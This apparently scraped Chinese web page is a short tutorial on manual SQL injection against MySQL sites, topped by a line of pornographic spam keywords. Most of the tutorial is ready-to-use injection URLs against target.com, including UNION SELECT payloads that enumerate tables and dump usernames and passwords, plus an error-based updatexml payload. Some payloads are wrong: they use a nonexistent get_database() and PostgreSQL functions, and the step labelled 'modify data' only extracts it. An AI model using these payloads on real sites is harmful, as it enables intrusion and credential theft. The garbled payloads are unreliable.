色婷婷狠狠18禁久久YY,CHINESE性内射高清国产,国产女人18毛片水真多1,国产AV在线观看

mysql 手工注入教程

張吉惟2年前9瀏覽0評論

MySQL是一款開放源代碼的關系型數據庫管理系統,廣泛應用于互聯網,也是黑客注入網站的主要目標之一。手工注入是一種常見的sql注入方式,下面介紹手工注入的教程。

1. 探測目標網站的漏洞:使用工具或者直接手動測試來探測目標網站是否存在漏洞,例如檢查URL中是否存在一些特殊字符

<a href="?id=1">id=1</a>
<a href="?id=1 and 1=2-1">id=1 and 1=2-1</a>
<a href="?id=1 and 1=2-2">id=1 and 1=2-2</a>

2. 使用注入點:當發現漏洞時,就可以使用注入點進行注入攻擊,將SQL命令注入到目標網站的SQL語句中。

http://target.com/index.php?id=1' union select 1,2,3-- -

3. 深入探測:獲取數據庫的詳細信息,例如當前使用的數據庫、表的結構和內容等。

http://target.com/index.php?id=1' union select 1,2,get_database()-- -
http://target.com/index.php?id=1' union select 1,2,table_name from information_schema.tables where table_schema=database()-- -
http://target.com/index.php?id=1' union select 1,2,column_name from information_schema.columns where table_name='users'-- -
http://target.com/index.php?id=1' union select 1,username,password from users-- -

4. 注入攻擊:修改數據庫中的數據

http://target.com/index.php?id=1' and updatexml(1,concat(0x3a,version()),1)-- -
http://target.com/index.php?id=1' union select 1,"'||pg_database_size(pg_database_name())||",'test'-- -
http://target.com/index.php?id=1' union select 1,''||pg_database_size(pg_database_name())||''-- -
http://target.com/index.php?id=1' union select 1,''||pg_database_size(pg_database_name())||'','$'-- -

總結,手工注入是一種有效的攻擊方式,但是使用時需要慎重,避免對被攻擊網站造成不必要的傷害。